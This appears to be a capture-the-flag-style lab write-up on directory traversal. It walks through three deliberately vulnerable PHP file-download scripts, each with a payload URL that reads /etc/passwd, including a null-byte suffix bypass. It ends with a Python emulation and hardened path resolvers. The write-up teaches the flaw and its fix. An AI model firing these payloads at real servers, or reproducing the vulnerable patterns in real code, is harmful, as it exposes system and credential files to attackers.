Example 1
Source:
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file;
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
Explanation: the script's normal job is to serve an image such as hack.png; it opens the file in binary mode ($handle = fopen($path, 'rb');) and streams it back in 8 KB chunks. The file parameter is concatenated straight into $path with no filtering at all, so ../../../ sequences walk back out of /var/www/files/ (directory traversal). The only gate is is_file($path), which merely requires the target to exist and be a regular file, which /etc/passwd is.
Payload:
http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd
Example 2
Source:
<?php
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
if (!(strstr($file,"/var/www/files/")))
die();
if (!is_file($file))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
$handle = fopen($file, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
Explanation: this version checks that the file parameter contains /var/www/files/, but strstr() is a substring test, not a prefix or canonical-path test. Supplying the expected directory first satisfies the check, and ../../ after it still traverses out of the directory:
Payload:
http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd
Example 3
Source:
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
// (\x00 is the NUL byte: drop it and everything after it)
$path = preg_replace('/\x00.*/',"",$path);
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
Explanation:
$path = $UploadDir . $file.".png"; forces a .png suffix onto whatever is read, so file=../../../etc/passwd alone would look for /var/www/files/../../../etc/passwd.png and fail the is_file() check.
Historically this kind of suffix could be bypassed with a null byte (%00): PHP's filesystem functions were C-string based and stopped reading the path at the first NUL, so everything after it, including the forced suffix, was ignored. That only worked on PHP versions before 5.3.4 (5.3.4 started rejecting paths containing NUL) and only with magic_quotes_gpc off, since magic quotes would escape the null byte as \0 and break the trick.
The lab does not depend on an old PHP: $path = preg_replace('/\x00.*/',"",$path); simulates the old behaviour with a regex that replaces the NUL byte and everything after it with an empty string. With the payload below, the %00.png tail is stripped entirely and $path becomes /var/www/files/../../../../../etc/passwd, which is_file() accepts.
Payload:
http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00
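As an added example (not code from the lab or from the original write-up), the Python below emulates the three PHP checks of Examples 1 to 3 and runs the page's own payloads through them, then shows two hardened resolvers: a lexical one (normalise, then require the upload directory as a prefix) and a filesystem one (realpath() plus an existing-regular-file check, which also catches symlinks that the lexical check cannot see). UPLOAD_DIR, safe_join, safe_resolve and demo_symlink_escape are this example's own names, and the symlink scenario is constructed in a temporary directory; the PHP equivalent of safe_resolve is realpath() on the built path compared against realpath($UploadDir), after rejecting any "\0" in the input.

```python
import os
import posixpath
import tempfile

# Mirrors the lab's $UploadDir (assumption: POSIX-style paths throughout).
UPLOAD_DIR = "/var/www/files/"


def example1_path(file):
    """Example 1: plain concatenation, no check at all."""
    return UPLOAD_DIR + file


def example2_accepts(file):
    """Example 2: strstr($file, '/var/www/files/') -- the substring anywhere passes."""
    return "/var/www/files/" in file


def example3_path(file):
    """Example 3: forced '.png' suffix, then the simulated null-byte truncation
    (equivalent of preg_replace('/\\x00.*/', '', $path))."""
    path = UPLOAD_DIR + file + ".png"
    return path.split("\x00", 1)[0]


def escapes_base(path, base=UPLOAD_DIR):
    """True if the lexically normalised path lies outside base, i.e. what the
    kernel would actually open once the '..' components are applied."""
    base_norm = posixpath.normpath(base)
    resolved = posixpath.normpath(path)
    return resolved != base_norm and not resolved.startswith(base_norm + "/")


def safe_join(base, user_input, suffix=""):
    """Hardened lexical check: reject NUL, normalise, require base as a prefix.
    Returns the candidate path, or None when the input must be refused."""
    if "\x00" in user_input:
        return None
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_input + suffix))
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        return None
    return candidate


def safe_resolve(base, user_input, suffix=""):
    """Hardened filesystem check: canonicalise with realpath() so symlinks count,
    then require the target to be an existing regular file under base."""
    if "\x00" in user_input:
        return None
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, user_input + suffix))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    if not os.path.isfile(target):
        return None
    return target


def demo_symlink_escape():
    """Constructed scenario: an upload dir holding a symlink that points at a file
    outside it. The lexical check passes (there is no '..' anywhere) while the
    realpath check rejects it. Returns (lexical_accepted, realpath_rejected)."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "files")
        os.mkdir(base)
        secret = os.path.join(root, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("constructed secret, not a real file from the lab\n")
        os.symlink(secret, os.path.join(base, "link.png"))
        lexical = safe_join(base, "link", ".png")
        real = safe_resolve(base, "link", ".png")
        return lexical is not None, real is None


if __name__ == "__main__":
    for label, path in [
        ("example1", example1_path("../../../etc/passwd")),
        ("example2", "/var/www/files/../../../etc/passwd"),
        ("example3", example3_path("../../../../../etc/passwd\x00")),
    ]:
        print(f"{label}: {path!r} -> escapes base: {escapes_base(path)}")
    print("example2 strstr check accepts payload:",
          example2_accepts("/var/www/files/../../../etc/passwd"))
    print("hardened:", safe_join(UPLOAD_DIR, "../../../etc/passwd"),
          safe_join(UPLOAD_DIR, "hacker.png"))
    print("symlink demo (lexical accepted, realpath rejected):", demo_symlink_escape())
```

Two points the emulation makes visible: every weak check on the page is a test on the string the user sent, while the kernel applies the '..' components afterwards, so the decision has to be taken on the normalised path; and even a correct lexical prefix check says nothing about symlinks inside the upload directory, which is why the realpath()-based variant is the one to use on a real filesystem.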
OVER!